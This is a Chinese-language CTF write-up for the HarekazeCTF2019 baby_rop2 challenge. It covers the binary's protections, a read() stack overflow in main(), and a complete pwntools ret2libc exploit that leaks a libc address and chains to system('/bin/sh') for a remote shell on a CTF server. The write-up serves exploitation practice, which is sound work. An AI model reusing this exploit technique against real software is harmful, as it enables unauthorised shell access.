HugeH4rD

[HarekazeCTF2019]baby_rop2

https://github.com/TeamHarekaze/HarekazeCTF2019-challenges/raw/master/baby_rop_2/attachments/libc.so.6

checksec

[*] '/home/zelas/Desktop/pwn/[HarekazeCTF2019]baby_rop2/babyrop2'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled			//栈不可执行
    PIE:      No PIE (0x400000)

IDA

main()

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char buf[28]; // [rsp+0h] [rbp-20h] BYREF
  int v5; // [rsp+1Ch] [rbp-4h]

  setvbuf(stdout, 0LL, 2, 0LL);
  setvbuf(stdin, 0LL, 2, 0LL);
  printf("What's your name? ");
  v5 = read(0, buf, 0x100uLL);		//read()存在栈溢出漏洞
  buf[v5 - 1] = 0;
  printf("Welcome to the Pwn World again, %s!\n", buf);
  return 0;
}

无可疑字符串

无可疑函数

0x02

思路 ret2libc x64

1.利用read()处溢出泄露read_got

2.利用Libcsearcher计算出system()和/bin/sh的地址

3.再次执行main(),再次溢出至system()

s	0x20
rbp	0x8
pop_rdi_ret	read_got
ret	printf()
printf_ret	main()

s	0x20
rbp	0x8
pop_rdi_ret	/bin/sh
ret	system()
sys_ret	0xdeadbeef

0x03

exp

from pwn import *

context(os='linux', arch='amd64', log_level='debug')
# io = process(['./babyrop2'])
io = remote('node4.buuoj.cn', 28018)
elf = ELF('./babyrop2')
libc = ELF('./libc.so.6')

padding = 0x20 + 0x8
pop_rdi_ret = 0x400733
printf_plt = 0x4004f0
read_got = elf.got['read']

print('[+] read_got', hex(read_got))

main = 0x400636
payload = flat(b'a' * padding, pop_rdi_ret, read_got, printf_plt, main)
delim1 = b'What\'s your name?'
io.sendlineafter(delim1, payload)
delim2 = b'\x7f'
read_addr = u64(io.recvuntil(delim2)[-6:].ljust(8, b'\x00'))
print('[+] read_addr', hex(read_addr))

libc_base = read_addr - libc.symbols['read']
system = libc_base + libc.symbols['system']
bin_sh = libc_base + libc.search(b'/bin/sh\x00').__next__()

print('[+] libc_base_addr', hex(libc_base))
print('[+] system_addr', hex(system))
print('[+] bin_sh_addr', hex(bin_sh))

payload1 = flat(b'a' * padding, pop_rdi_ret, bin_sh, system)
sleep(1)
io.sendline(payload1)
io.interactive()

匿名评论隐私政策

✅ 你无需删除空行，直接评论以获取最佳展示效果

[HarekazeCTF2019]baby_rop2

0x02

0x03

Zelas2Xerath